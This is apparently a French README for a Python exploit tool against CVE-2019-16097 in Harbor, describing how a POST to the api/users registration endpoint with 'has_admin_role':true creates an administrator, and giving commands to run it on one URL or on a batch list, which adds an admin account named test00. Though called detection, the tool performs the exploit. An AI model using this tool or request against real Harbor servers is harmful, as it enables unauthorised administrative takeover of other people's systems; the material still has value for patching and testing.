
harbor(<1.7.6/1.8.3) escalation de privilèges (CVE-2019-16097)
En septembre 2019, une vulnérabilité a été découverte dans Harbor permettant d'ajouter un administrateur via la fonction d'inscription. En utilisant l'interface d'inscription api/users et en construisant un paramètre POST "has_admin_role":true, on peut directement ajouter un administrateur.
Cet outil prend en charge la détection sur une seule URL ou en lot.
python2.7
pip install requests
Aide d'utilisation : python harbor-give-me-admin.py -h

Détection d'une seule URL : python harbor-give-me-admin.py -u "https://www.xxx.com/"
// Si l'exploitation réussit, un compte administrateur test00 sera ajouté, soyez prudent !

Détection par lot : python harbor-give-me-admin.py -f urls,txt
// Si l'exploitation réussit, un compte administrateur test00 sera ajouté, soyez prudent !
gmail:[email protected]